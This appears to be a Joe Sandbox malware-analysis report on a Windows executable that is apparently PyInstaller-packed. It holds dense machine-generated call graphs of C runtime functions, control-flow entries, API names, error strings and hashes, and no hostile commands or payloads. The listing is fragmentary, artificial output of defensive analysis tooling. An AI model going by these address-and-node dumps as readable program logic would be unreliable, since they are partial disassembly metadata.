17044 f6628f 17042->17044 17044->17006 17044->17024 17061 f65f16 17045->17061 17117 f60cda 17050->17117 17054 f6303b 17058 f62867 _mbstowcs 23 API calls 17054->17058 17055 f6301c IsProcessorFeaturePresent 17057 f63028 17055->17057 17056 f63012 17056->17054 17056->17055 17059 f63987 _mbstowcs 8 API calls 17057->17059 17060 f63045 17058->17060 17059->17054 17062 f65f22 ___scrt_is_nonwritable_in_current_image 17061->17062 17075 f68793 EnterCriticalSection 17062->17075 17064 f65f2c 17076 f65f5c 17064->17076 17067 f66028 17068 f66034 ___scrt_is_nonwritable_in_current_image 17067->17068 17080 f68793 EnterCriticalSection 17068->17080 17070 f6603e 17081 f66209 17070->17081 17072 f66056 17085 f66076 17072->17085 17075->17064 17079 f687db LeaveCriticalSection 17076->17079 17078 f65f4a 17078->17067 17079->17078 17080->17070 17082 f66218 _mbstowcs 17081->17082 17084 f6623f _mbstowcs 17081->17084 17082->17084 17088 f6a979 17082->17088 17084->17072 17116 f687db LeaveCriticalSection 17085->17116 17090 f6a9f9 17088->17090 17091 f6a98f 17088->17091 17092 f63b77 _free 14 API calls 17090->17092 17115 f6aa47 17090->17115 17091->17090 17096 f63b77 _free 14 API calls 17091->17096 17112 f6a9c2 17091->17112 17093 f6aa1b 17092->17093 17114 f6a9e4 17112->17114 17147 f60b12 17117->17147 17120 f60d1f 17121 f60d2b ___scrt_is_nonwritable_in_current_image 17120->17121 17122 f663ab __dosmaperr 14 API calls 17121->17122 17123 f60d52 _mbstowcs 17121->17123 17127 f60d58 _mbstowcs 17121->17127 17122->17123 17124 f60d9f 17123->17124 17123->17127 17130 f60d89 17123->17130 17125 f5e619 __dosmaperr 14 API calls 17124->17125 17126 f60da4 17125->17126 17128 f63b33 _mbstowcs 25 API calls 17126->17128 17129 f60dcb 17127->17129 17157 f68793 EnterCriticalSection 17127->17157 17128->17130 17133 f60efe 17129->17133 17136 f60e0d 17129->17136 17144 f60e3c 17129->17144 17130->17056 17134 f60f09 17133->17134 17162 f687db LeaveCriticalSection 17133->17162 17138 f62867 _mbstowcs 23 API calls 17134->17138 17139 f66254 
_mbstowcs 37 API calls 17136->17139 17136->17144 17140 f60f11 17138->17140 17142 f60e31 17139->17142 17141 f66254 _mbstowcs 37 API calls 17145 f60e91 17141->17145 17143 f66254 _mbstowcs 37 API calls 17142->17143 17143->17144 17158 f60eab 17144->17158 17145->17130 17146 f66254 _mbstowcs 37 API calls 17145->17146 17146->17130 17148 f60b1e ___scrt_is_nonwritable_in_current_image 17147->17148 17153 f68793 EnterCriticalSection 17148->17153 17150 f60b2c 17154 f60b6a 17150->17154 17153->17150 17155 f687db __wsopen_s LeaveCriticalSection 17154->17155 17156 f60b53 17155->17156 17156->17056 17156->17120 17157->17129 17159 f60eb1 17158->17159 17160 f60e82 17158->17160 17163 f687db LeaveCriticalSection 17159->17163 17160->17130 17160->17141 17160->17145 17162->17134 17163->17160 17165 f6abd1 ___scrt_is_nonwritable_in_current_image 17164->17165 17166 f66254 _mbstowcs 37 API calls 17165->17166 17167 f6abda 17166->17167 17174 f6ac20 17167->17174 17177 f68793 EnterCriticalSection 17167->17177 17169 f6abf8 17178 f6ac46 17169->17178 17174->17028 17175 f63002 _mbstowcs 37 API calls 17176 f6ac45 17175->17176 17177->17169 17179 f6ac54 _mbstowcs 17178->17179 17181 f6ac09 17178->17181 17180 f6a979 _mbstowcs 14 API calls 17179->17180 17179->17181 17180->17181 17182 f6ac25 17181->17182 17185 f687db LeaveCriticalSection 17182->17185 17184 f6ac1c 17184->17174 17184->17175 17185->17184 17187 f66254 _mbstowcs 37 API calls 17186->17187 17188 f6a1f9 17187->17188 17191 f6a107 17188->17191 17192 f6a113 ___scrt_is_nonwritable_in_current_image 17191->17192 17198 f6a12d 17192->17198 17202 f68793 EnterCriticalSection 17192->17202 17194 f6a13d 17200 f63b77 _free 14 API calls 17194->17200 17201 f6a169 17194->17201 17195 f6a134 17195->17033 17197 f63002 _mbstowcs 37 API calls 17199 f6a1a6 17197->17199 17198->17195 17198->17197 17200->17201 17203 f6a186 17201->17203 17202->17194 17206 f687db LeaveCriticalSection 17203->17206 17205 f6a18d 17205->17198 17206->17205 17208 f5e05c 17207->17208 17209 f5e049 
17207->17209 17208->16991 17210 f5e619 __dosmaperr 14 API calls 17209->17210 17211 f5e04e 17210->17211 17212 f63b33 _mbstowcs 25 API calls 17211->17212 17213 f5e059 17212->17213 17213->16991 17283 f5cdf7 17214->17283 17216 f5cdbe 17217 f5cdd5 17216->17217 17218 f5e619 __dosmaperr 14 API calls 17216->17218 17217->16991 17219 f5cdc7 17218->17219 17220 f63b33 _mbstowcs 25 API calls 17219->17220 17221 f5cdd2 17220->17221 17221->16991 17223 f5d652 17222->17223 17224 f5d64b 17222->17224 17223->16991 17292 f5ca25 17224->17292 17228 f5ceb0 17227->17228 17229 f5cea9 17227->17229 17228->16991 17230 f5ca25 40 API calls 17229->17230 17231 f5ceaf 17230->17231 17231->16991 17233 f5cef4 17232->17233 17234 f5cf0e 17232->17234 17235 f5cf3e 17233->17235 17236 f5d1cc 17233->17236 17237 f5d238 17233->17237 17234->17235 17238 f5e619 __dosmaperr 14 API calls 17234->17238 17235->16991 17249 f5d20f 17236->17249 17252 f5d1d8 17236->17252 17240 f5d23f 17237->17240 17241 f5d27e 17237->17241 17237->17249 17239 f5cf2a 17238->17239 17242 f63b33 _mbstowcs 25 API calls 17239->17242 17245 f5d1e6 17240->17245 17246 f5d244 17240->17246 17363 f5dee9 17241->17363 17243 f5cf35 17242->17243 17243->16991 17258 f5d1f4 17245->17258 17260 f5d208 17245->17260 17357 f5d7b0 17245->17357 17246->17249 17251 f5d249 17246->17251 17249->17258 17249->17260 17348 f5db91 17249->17348 17250 f5d21f 17250->17260 17334 f5da68 17250->17334 17253 f5d25c 17251->17253 17254 f5d24e 17251->17254 17252->17245 17252->17250 17252->17258 17342 f5de37 17253->17342 17254->17260 17338 f5deab 17254->17338 17258->17260 17366 f5e0e6 17258->17366 17260->16991 17262 f5d1cc 17261->17262 17263 f5d238 17261->17263 17271 f5d20f 17262->17271 17273 f5d1d8 17262->17273 17264 f5d23f 17263->17264 17265 f5d27e 17263->17265 17263->17271 17266 f5d244 17264->17266 17275 f5d1e6 17264->17275 17267 f5dee9 26 API calls 17265->17267 17270 f5d249 17266->17270 17266->17271 17280 f5d1f4 17267->17280 17268 f5db91 26 API calls 17268->17280 17269 f5d7b0 40 API 
calls 17269->17280 17274 f5d25c 17270->17274 17276 f5d24e 17270->17276 17271->17268 17271->17280 17282 f5d208 17271->17282 17272 f5d21f 17278 f5da68 39 API calls 17272->17278 17272->17282 17273->17272 17273->17275 17273->17280 17277 f5de37 25 API calls 17274->17277 17275->17269 17275->17280 17275->17282 17279 f5deab 26 API calls 17276->17279 17276->17282 17277->17280 17278->17280 17279->17280 17281 f5e0e6 39 API calls 17280->17281 17280->17282 17281->17282 17282->16991 17286 f5ce3c 17283->17286 17285 f5ce03 17285->17216 17287 f5ce5e _mbstowcs 17286->17287 17288 f5e619 __dosmaperr 14 API calls 17287->17288 17291 f5ce95 17287->17291 17289 f5ce8a 17288->17289 17290 f63b33 _mbstowcs 25 API calls 17289->17290 17290->17291 17291->17285 17293 f5ca37 17292->17293 17294 f5ca3c 17292->17294 17295 f5e619 __dosmaperr 14 API calls 17293->17295 17300 f65c0b 17294->17300 17295->17294 17298 f5e619 __dosmaperr 14 API calls 17299 f5ca6e 17298->17299 17299->16991 17301 f65c26 17300->17301 17304 f63077 17301->17304 17305 f5e044 25 API calls 17304->17305 17309 f63089 17305->17309 17306 f630c2 17307 f5c80e _mbstowcs 37 API calls 17306->17307 17314 f630ce 17307->17314 17308 f6309e 17310 f5e619 __dosmaperr 14 API calls 17308->17310 17309->17306 17309->17308 17321 f5ca5a 17309->17321 17311 f630a3 17310->17311 17312 f63b33 _mbstowcs 25 API calls 17311->17312 17312->17321 17315 f630fd 17314->17315 17322 f638f9 17314->17322 17318 f63167 17315->17318 17328 f638a2 17315->17328 17316 f638a2 25 API calls 17319 f6322d 17316->17319 17318->17316 17320 f5e619 __dosmaperr 14 API calls 17319->17320 17319->17321 17320->17321 17321->17298 17321->17299 17323 f63936 17322->17323 17324 f63906 17322->17324 17326 f69679 __wsopen_s 37 API calls 17323->17326 17325 f63915 _mbstowcs 17324->17325 17327 f6b373 40 API calls 17324->17327 17325->17314 17326->17325 17327->17325 17329 f638c7 17328->17329 17330 f638b3 17328->17330 17329->17318 17330->17329 17331 f5e619 __dosmaperr 14 API calls 17330->17331 17332 f638bc 
17331->17332 17333 f63b33 _mbstowcs 25 API calls 17332->17333 17333->17329 17335 f5da83 17334->17335 17336 f5dab8 17335->17336 17372 f65dbb 17335->17372 17336->17258 17339 f5deb7 17338->17339 17340 f5db91 26 API calls 17339->17340 17341 f5dec9 17340->17341 17341->17258 17343 f5de4c 17342->17343 17344 f5e619 __dosmaperr 14 API calls 17343->17344 17347 f5de60 17343->17347 17345 f5de55 17344->17345 17346 f63b33 _mbstowcs 25 API calls 17345->17346 17346->17347 17347->17258 17349 f5dba4 17348->17349 17350 f5dbbf 17349->17350 17352 f5dbd6 17349->17352 17351 f5e619 __dosmaperr 14 API calls 17350->17351 17353 f5dbc4 17351->17353 17356 f5dbcf 17352->17356 17407 f5c2e8 17352->17407 17354 f63b33 _mbstowcs 25 API calls 17353->17354 17354->17356 17356->17258 17358 f5d7c9 17357->17358 17359 f5c2e8 15 API calls 17358->17359 17360 f5d806 17359->17360 17420 f66eb3 17360->17420 17362 f5d87e 17362->17258 17364 f5db91 26 API calls 17363->17364 17365 f5df00 17364->17365 17365->17258 17370 f5e157 17366->17370 17371 f5e103 17366->17371 17367 f596fa _ValidateLocalCookies 5 API calls 17369 f5e187 17367->17369 17368 f65dbb 39 API calls 17368->17371 17369->17260 17370->17367 17371->17368 17371->17370 17373 f65dcb 17372->17373 17374 f65df5 17373->17374 17375 f65e09 17373->17375 17387 f65dd0 17373->17387 17376 f5e619 __dosmaperr 14 API calls 17374->17376 17377 f5c80e _mbstowcs 37 API calls 17375->17377 17378 f65dfa 17376->17378 17379 f65e14 17377->17379 17380 f63b33 _mbstowcs 25 API calls 17378->17380 17381 f65e24 17379->17381 17382 f65e50 17379->17382 17380->17387 17397 f6b522 17381->17397 17383 f65e58 17382->17383 17401 f680d7 17382->17401 17392 f65e66 __fread_nolock 17383->17392 17396 f65e9d __fread_nolock 17383->17396 17387->17336 17388 f65ecd 17389 f65ee1 GetLastError 17388->17389 17388->17392 17389->17392 17389->17396 17390 f5e619 __dosmaperr 14 API calls 17390->17387 17391 f5e619 __dosmaperr 14 API calls 17394 f65f07 17391->17394 17392->17387 17392->17390 17393 f5e619 __dosmaperr 14 API 
calls 17393->17387 17395 f63b33 _mbstowcs 25 API calls 17394->17395 17395->17387 17396->17387 17396->17391 17398 f6b53d 17397->17398 17399 f65e39 17397->17399 17398->17399 17404 f6b5cd 17398->17404 17399->17387 17399->17393 17402 f680ee WideCharToMultiByte 17401->17402 17402->17388 17405 f5e619 __dosmaperr 14 API calls 17404->17405 17406 f6b5e1 17405->17406 17406->17399 17408 f5c2fd 17407->17408 17409 f5c30c 17407->17409 17410 f5e619 __dosmaperr 14 API calls 17408->17410 17411 f5c302 17409->17411 17412 f65ba2 __fread_nolock 15 API calls 17409->17412 17410->17411 17411->17356 17413 f5c333 17412->17413 17414 f5c34a 17413->17414 17417 f5c8ab 17413->17417 17416 f63b77 _free 14 API calls 17414->17416 17416->17411 17418 f63b77 _free 14 API calls 17417->17418 17419 f5c8ba 17418->17419 17419->17414 17421 f66ec3 17420->17421 17422 f66ed9 17420->17422 17423 f5e619 __dosmaperr 14 API calls 17421->17423 17422->17421 17426 f66eeb 17422->17426 17424 f66ec8 17423->17424 17425 f63b33 _mbstowcs 25 API calls 17424->17425 17436 f66ed2 17425->17436 17427 f66f27 17426->17427 17428 f66f56 17426->17428 17441 f66d57 17427->17441 17429 f66f7f 17428->17429 17430 f66f84 17428->17430 17433 f66fea 17429->17433 17434 f66fa8 17429->17434 17449 f66605 17430->17449 17477 f66914 17433->17477 17437 f66fcc 17434->17437 17438 f66fad 17434->17438 17436->17362 17470 f66b04 17437->17470 17460 f66c8d 17438->17460 17442 f66d6d 17441->17442 17443 f66d78 17441->17443 17442->17436 17485 f62fa8 17443->17485 17446 f66ddd 17446->17436 17447 f63b43 __wsopen_s 11 API calls 17448 f66deb 17447->17448 17450 f66617 17449->17450 17451 f5c80e _mbstowcs 37 API calls 17450->17451 17452 f6662b 17451->17452 17453 f66647 17452->17453 17454 f66633 17452->17454 17457 f66914 39 API calls 17453->17457 17459 f66642 __alldvrm __fread_nolock _strrchr 17453->17459 17455 f5e619 __dosmaperr 14 API calls 17454->17455 17456 f66638 17455->17456 17458 f63b33 _mbstowcs 25 API calls 17456->17458 17457->17459 17458->17459 17459->17436 17494 
f6bbe8 17460->17494 17471 f6bbe8 27 API calls 17470->17471 17472 f66b31 17471->17472 17473 f6b666 25 API calls 17472->17473 17474 f66b6f 17473->17474 17475 f66b76 17474->17475 17476 f66b95 37 API calls 17474->17476 17475->17436 17476->17475 17478 f6692c 17477->17478 17479 f6bbe8 27 API calls 17478->17479 17480 f66945 17479->17480 17481 f6b666 25 API calls 17480->17481 17482 f66990 17481->17482 17483 f66997 17482->17483 17484 f669bc 37 API calls 17482->17484 17483->17436 17484->17483 17486 f62fc3 17485->17486 17487 f62fb5 17485->17487 17488 f5e619 __dosmaperr 14 API calls 17486->17488 17487->17486 17492 f62fda 17487->17492 17489 f62fcb 17488->17489 17490 f63b33 _mbstowcs 25 API calls 17489->17490 17491 f62fd5 17490->17491 17491->17446 17491->17447 17492->17491 17493 f5e619 __dosmaperr 14 API calls 17492->17493 17493->17489 17495 f6bc1c 17494->17495 17496 f62e8c 25 API calls 17495->17496 17497 f6bc85 17496->17497 17498 f6bcb1 17497->17498 17504 f6bcde 17497->17504 17499 f62fa8 25 API calls 17498->17499 17500 f6bcce 17499->17500 17503 f62fa8 25 API calls 17503->17500 17508 f6d081 17504->17508 17509 f6bd19 17504->17509 17508->17503 17511 f6f780 21 API calls 17509->17511 17512 f6bd9f 17511->17512 17575 f56a98 17574->17575 17576 f56a3a WideCharToMultiByte 17574->17576 17577 f56a9c WideCharToMultiByte 17575->17577 17578 f56a56 17576->17578 17579 f56a6d 17576->17579 17580 f56ad0 17577->17580 17581 f56ab9 17577->17581 17582 f52290 51 API calls 17578->17582 17579->17577 17586 f56a81 17579->17586 17580->16940 17583 f52290 51 API calls 17581->17583 17584 f56a65 17582->17584 17585 f56ac8 17583->17585 17584->16940 17585->16940 17587 f52290 51 API calls 17586->17587 17588 f56a90 17587->17588 17588->16940 22356 f6611b 22357 f66126 22356->22357 22358 f66136 22356->22358 22362 f6613c 22357->22362 22361 f63b77 _free 14 API calls 22361->22358 22363 f66151 22362->22363 22364 f66157 22362->22364 22365 f63b77 _free 14 API calls 22363->22365 22366 f63b77 _free 14 API calls 22364->22366 
22365->22364 22367 f66163 22366->22367 22368 f63b77 _free 14 API calls 22367->22368 22369 f6616e 22368->22369 22370 f63b77 _free 14 API calls 22369->22370 22371 f66179 22370->22371 22372 f63b77 _free 14 API calls 22371->22372 22373 f66184 22372->22373 22374 f63b77 _free 14 API calls 22373->22374 22375 f6618f 22374->22375 22376 f63b77 _free 14 API calls 22375->22376 22377 f6619a 22376->22377 22378 f63b77 _free 14 API calls 22377->22378 22379 f661a5 22378->22379 22380 f63b77 _free 14 API calls 22379->22380 22381 f661b0 22380->22381 22382 f63b77 _free 14 API calls 22381->22382 22383 f661be 22382->22383 22388 f65f68 22383->22388 22389 f65f74 ___scrt_is_nonwritable_in_current_image 22388->22389 22404 f68793 EnterCriticalSection 22389->22404 22391 f65fa8 22405 f65fc7 22391->22405 22393 f65f7e 22393->22391 22395 f63b77 _free 14 API calls 22393->22395 22395->22391 22396 f65fd3 22397 f65fdf ___scrt_is_nonwritable_in_current_image 22396->22397 22409 f68793 EnterCriticalSection 22397->22409 22399 f65fe9 22400 f66209 __dosmaperr 14 API calls 22399->22400 22401 f65ffc 22400->22401 22410 f6601c 22401->22410 22404->22393 22408 f687db LeaveCriticalSection 22405->22408 22407 f65fb5 22407->22396 22408->22407 22409->22399 22413 f687db LeaveCriticalSection 22410->22413 22412 f6600a 22412->22361 22413->22412 17598 f59800 17599 f5980c ___scrt_is_nonwritable_in_current_image 17598->17599 17624 f59bf9 17599->17624 17601 f59966 17662 f59ee1 IsProcessorFeaturePresent 17601->17662 17602 f59813 17602->17601 17612 f5983d ___scrt_is_nonwritable_in_current_image _mbstowcs ___scrt_release_startup_lock 17602->17612 17604 f5996d 17642 f628a3 17604->17642 17607 f62867 _mbstowcs 23 API calls 17608 f5997b 17607->17608 17609 f5985c 17610 f598dd 17632 f59ffc 17610->17632 17612->17609 17612->17610 17645 f6287d 17612->17645 17613 f598e3 17636 f51000 17613->17636 17625 f59c02 17624->17625 17666 f5a185 IsProcessorFeaturePresent 17625->17666 17629 f59c13 17631 f59c17 17629->17631 17676 f5af3d 17629->17676 
17631->17602 17738 f5a8f0 17632->17738 17635 f5a022 17635->17613 17637 f51006 17636->17637 17740 f566b0 17637->17740 17639 f51015 17753 f52f30 17639->17753 17643 f62741 _mbstowcs 23 API calls 17642->17643 17644 f59973 17643->17644 17644->17607 17646 f62893 __dosmaperr 17645->17646 17647 f62eeb ___scrt_is_nonwritable_in_current_image 17645->17647 17646->17610 17648 f66254 _mbstowcs 37 API calls 17647->17648 17649 f62efc 17648->17649 17650 f63002 _mbstowcs 37 API calls 17649->17650 17651 f62f26 GetCurrentProcessId 17650->17651 17651->17610 17663 f59ef7 _mbstowcs __fread_nolock 17662->17663 17664 f59fa2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17663->17664 17665 f59fed _mbstowcs 17664->17665 17665->17604 17667 f59c0e 17666->17667 17668 f5af1e 17667->17668 17682 f5b311 17668->17682 17672 f5af2f 17673 f5af3a 17672->17673 17696 f5b34d 17672->17696 17673->17629 17675 f5af27 17675->17629 17677 f5af46 17676->17677 17678 f5af50 17676->17678 17679 f5b2f6 ___vcrt_uninitialize_ptd 6 API calls 17677->17679 17678->17631 17680 f5af4b 17679->17680 17681 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 17680->17681 17681->17678 17683 f5b31a 17682->17683 17685 f5b343 17683->17685 17686 f5af23 17683->17686 17700 f5b575 17683->17700 17687 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 17685->17687 17686->17675 17688 f5b2c3 17686->17688 17687->17686 17719 f5b486 17688->17719 17693 f5b2f3 17693->17672 17695 f5b2d8 17695->17672 17697 f5b358 17696->17697 17699 f5b377 17696->17699 17698 f5b362 DeleteCriticalSection 17697->17698 17698->17698 17698->17699 17699->17675 17705 f5b43d 17700->17705 17703 f5b5ad InitializeCriticalSectionAndSpinCount 17704 f5b598 17703->17704 17704->17683 17706 f5b455 17705->17706 17707 f5b478 17705->17707 17706->17707 17711 f5b3a3 17706->17711 17707->17703 17707->17704 17710 f5b46a GetProcAddress 17710->17707 17717 f5b3af ___vcrt_FlsSetValue 17711->17717 17712 f5b423 17712->17707 17712->17710 17713 f5b3c5 LoadLibraryExW 
17714 f5b3e3 GetLastError 17713->17714 17715 f5b42a 17713->17715 17714->17717 17715->17712 17716 f5b432 FreeLibrary 17715->17716 17716->17712 17717->17712 17717->17713 17718 f5b405 LoadLibraryExW 17717->17718 17718->17715 17718->17717 17720 f5b43d ___vcrt_FlsSetValue 5 API calls 17719->17720 17721 f5b4a0 17720->17721 17722 f5b4b9 TlsAlloc 17721->17722 17723 f5b2cd 17721->17723 17723->17695 17724 f5b537 17723->17724 17725 f5b43d ___vcrt_FlsSetValue 5 API calls 17724->17725 17726 f5b551 17725->17726 17727 f5b56c TlsSetValue 17726->17727 17728 f5b2e6 17726->17728 17727->17728 17728->17693 17729 f5b2f6 17728->17729 17730 f5b300 17729->17730 17731 f5b306 17729->17731 17733 f5b4c1 17730->17733 17731->17695 17734 f5b43d ___vcrt_FlsSetValue 5 API calls 17733->17734 17735 f5b4db 17734->17735 17736 f5b4f3 TlsFree 17735->17736 17737 f5b4e7 17735->17737 17736->17737 17737->17731 17739 f5a00f GetStartupInfoW 17738->17739 17739->17635 17744 f566c4 17740->17744 17741 f566cd 17741->17639 17742 f567b4 17742->17639 17743 f566f0 WideCharToMultiByte 17743->17744 17746 f56760 17743->17746 17744->17741 17744->17742 17744->17743 17744->17746 17747 f5672b WideCharToMultiByte 17744->17747 17745 f52290 53 API calls 17748 f56782 17745->17748 17746->17745 17747->17744 17747->17746 17749 f567a1 17748->17749 17750 f5e365 ___vcrt_freefls@4 14 API calls 17748->17750 17751 f5e365 ___vcrt_freefls@4 14 API calls 17749->17751 17750->17748 17752 f567a7 17751->17752 17752->17639 17754 f52f3a __wsopen_s 17753->17754 17841 f5efe0 17754->17841 17759 f530a5 17761 f596fa _ValidateLocalCookies 5 API calls 17759->17761 18108 f67d77 17841->18108 17843 f52f69 17844 f51a60 17843->17844 17845 f51a6d 17844->17845 17846 f51a85 17845->17846 18269 f521e0 17845->18269 17846->17759 17848 f534a0 17846->17848 18300 f59710 17848->18300 18109 f67d9e 18108->18109 18110 f67d89 18108->18110 18109->18110 18114 f67dc5 18109->18114 18111 f5e619 __dosmaperr 14 API calls 18110->18111 18112 f67d8e 18111->18112 18113 f63b33 
_mbstowcs 25 API calls 18112->18113 18115 f67d99 18113->18115 18118 f67c4c 18114->18118 18115->17843 18119 f67c58 ___scrt_is_nonwritable_in_current_image 18118->18119 18126 f5e52c EnterCriticalSection 18119->18126 18121 f67c66 18127 f67ca7 18121->18127 18126->18121 18139 f5fafd 18127->18139 18140 f5fb15 18139->18140 18141 f5fb3a 18139->18141 18140->18141 18142 f62f81 __fread_nolock 25 API calls 18140->18142 18145 f63ecc 18141->18145 18143 f5fb33 18142->18143 18146 f63ee3 18145->18146 18148 f63ef5 18145->18148 18146->18148 18270 f5221c 18269->18270 18271 f5e312 44 API calls 18270->18271

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 692 f627a5-f627b2 call f6a500 695 f627d4-f627e0 call f627e7 ExitProcess 692->695 696 f627b4-f627c2 GetPEB 692->696 696->695 697 f627c4-f627ce GetCurrentProcess TerminateProcess 696->697 697->695
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627C7
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627CE
                                                                                                                      • ExitProcess.KERNEL32 ref: 00F627E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction ID: ed649b7f3ef905d911cfbafec6c0ba88809bbd567e01d6bedf1300f94c5e6612
                                                                                                                      • Opcode Fuzzy Hash: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction Fuzzy Hash: 4FE04631400548EFCF11AF24CC48D083B68EB00351B004520F80A8A532CB39EE81FB91

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                      • API String ID: 2638373210-4158440160
                                                                                                                      • Opcode ID: abff41bf91693fff641e96be83e4bc90fc6b55b5d6f9cea76ec7c316db1b3975
                                                                                                                      • Instruction ID: 5ecc2a3e2051054b1bfb9eef16c1b2163bd7af2362ac5ce5d6a4da7e54919e3e
                                                                                                                      • Opcode Fuzzy Hash: abff41bf91693fff641e96be83e4bc90fc6b55b5d6f9cea76ec7c316db1b3975
                                                                                                                      • Instruction Fuzzy Hash: 2F51E771A007009BC718DF28DC46A16B7E1BF48322F548A2DFA4EC3691E675E54CEB43

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 59 f644f5-f64505 60 f64507-f6451a call f5e606 call f5e619 59->60 61 f6451f-f64521 59->61 75 f6489e 60->75 63 f64886-f64893 call f5e606 call f5e619 61->63 64 f64527-f6452d 61->64 82 f64899 call f63b33 63->82 64->63 67 f64533-f64559 64->67 67->63 70 f6455f-f64568 67->70 73 f64582-f64584 70->73 74 f6456a-f6457d call f5e606 call f5e619 70->74 78 f64882-f64884 73->78 79 f6458a-f6458d 73->79 74->82 81 f648a1-f648a4 75->81 78->81 79->78 80 f64593-f64597 79->80 80->74 84 f64599-f645b0 80->84 82->75 87 f645b2-f645b5 84->87 88 f64601-f64607 84->88 90 f645b7-f645c0 87->90 91 f645c5-f645cb 87->91 92 f645cd-f645e4 call f5e606 call f5e619 call f63b33 88->92 93 f64609-f64613 88->93 94 f64685-f64695 90->94 91->92 95 f645e9-f645fc 91->95 125 f647b9 92->125 97 f64615-f64617 93->97 98 f6461a-f6461b call f65ba2 93->98 99 f6475a-f64763 call f6b43e 94->99 100 f6469b-f646a7 94->100 95->94 97->98 104 f64620-f64638 call f63b77 * 2 98->104 114 f647d6 99->114 115 f64765-f64777 99->115 100->99 103 f646ad-f646af 100->103 103->99 107 f646b5-f646d9 103->107 129 f64655-f6467e call f64bdd 104->129 130 f6463a-f64650 call f5e619 call f5e606 104->130 107->99 111 f646db-f646f1 107->111 111->99 116 f646f3-f646f5 111->116 118 f647da-f647f2 ReadFile 114->118 115->114 120 f64779-f64788 GetConsoleMode 115->120 116->99 121 f646f7-f6471d 116->121 123 f647f4-f647fa 118->123 124 f6484e-f64859 GetLastError 118->124 120->114 126 f6478a-f6478e 120->126 121->99 128 f6471f-f64735 121->128 123->124 133 f647fc 123->133 131 f64872-f64875 124->131 132 f6485b-f6486d call f5e619 call f5e606 124->132 127 f647bc-f647c6 call f63b77 125->127 126->118 134 f64790-f647aa ReadConsoleW 126->134 127->81 128->99 140 f64737-f64739 128->140 129->94 130->125 137 f647b2-f647b8 call f5e5e3 131->137 138 f6487b-f6487d 131->138 132->125 144 f647ff-f64811 133->144 135 f647ac GetLastError 134->135 136 
f647cb-f647d4 134->136 135->137 136->144 137->125 138->127 140->99 147 f6473b-f64755 140->147 144->127 151 f64813-f64817 144->151 147->99 155 f64830-f6483b 151->155 156 f64819-f64829 call f6420f 151->156 158 f64847-f6484c call f64060 155->158 159 f6483d call f64366 155->159 165 f6482c-f6482e 156->165 166 f64842-f64845 158->166 159->166 165->127 166->165
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
